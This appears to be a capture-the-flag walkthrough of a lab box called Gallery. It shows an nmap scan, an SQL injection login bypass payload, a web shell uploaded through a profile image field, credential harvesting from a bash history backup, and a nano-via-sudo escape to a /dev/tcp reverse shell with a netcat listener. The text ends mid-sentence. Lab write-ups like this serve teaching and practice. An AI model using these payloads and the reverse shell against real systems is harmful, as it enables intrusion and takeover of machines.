First run up Rust-nmap and got two ports open , that is port 80 and port 8080
# Nmap 7.92 scan initiated Sat Feb 12 22:32:01 2022 as: nmap -A -oN nmap-scan 10.10.112.90
Nmap scan report for 10.10.112.90
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Simple Image Gallery System
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 22:33:06 2022 -- 1 IP address (1 host up) scanned in 65.51 seconds
Decided to open port 80 on my browser and it gave out apache server homepage
Now I open up , the other port 8080 , which is a proxy , and it redirects me to https://ip/gallery/ which has a login page
Initial Access & Foothold
So on the login page, I try SQLi with the payload : admin ' or 1=1 limit 1-- +' and I was able to login as administrator
Looking around the dashbord I found an upload field on the profile settings, so I uploaded the file captured the request , and then edited the file contents , to a simple web shell
I was able to get mysql creds , and $dev_data information which seem to be creds for the developer , and there was the username and password as hash, I was able to answer number three by login to mysql and then copying the hash for admin!
First thing I did, was to update the shell, so as it doesn’t give those shell errors
I was able to update the shell, and as I was checking through /var/backups I was able to see a user’s backup folder mike, so I read the history, and I was able to get the password
www-data@gallery:/var/backups/mike_home_backup$ cat .bash_history
cat .bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -lb[REDACTED]x
clear
sudo -l
exit
User.txt
www-data@gallery:/var/backups/mike_home_backup$ su mike
Password:
mike@gallery:/var/backups/mike_home_backup$ cd ~
mike@gallery:~$ ls
documents images user.txt
mike@gallery:~$ cat user.txt
THM{af05[REDACTED]46ef}
Privilege Escalation
I first run sudo -l and I got to see what commands can mike run as root
mike@gallery:~$ sudo -l
Matching Defaults entries for mike on gallery:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mike may run the following commands on gallery:
(root) NOPASSWD: /bin/bash /opt/rootkit.sh
I read the file /opt/rootkit.sh
#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
# Execute your choice
case $ans in
versioncheck)
/usr/bin/rkhunter --versioncheck ;;
update)
/usr/bin/rkhunter --update;;
list)
/usr/bin/rkhunter --list;;
read)
/bin/nano /root/report.txt;;
*)
exit;;
esac
^R^X [control+R + control+X]
reset; sh 1>&0 2>&0
and from here now I can type
/bin/bash -c "bash -i &>/dev/tcp/tunip/port <&1"
Set a listener on your terminal and boom we have root shell
[tahaafarooq@urchinsec-lab gallery]$ nc -lvnp 1122
Connection from 10.10.170.61:54522
root@gallery:~# id
id
uid=0(root) gid=0(root) groups=0(root)
After looking at the contents of rootkit.sh, we have four choices which is versioncheck, update, list and read. Now from the available choices, the last one seems to be interesting as we can run nano as root. Time for a quick look at
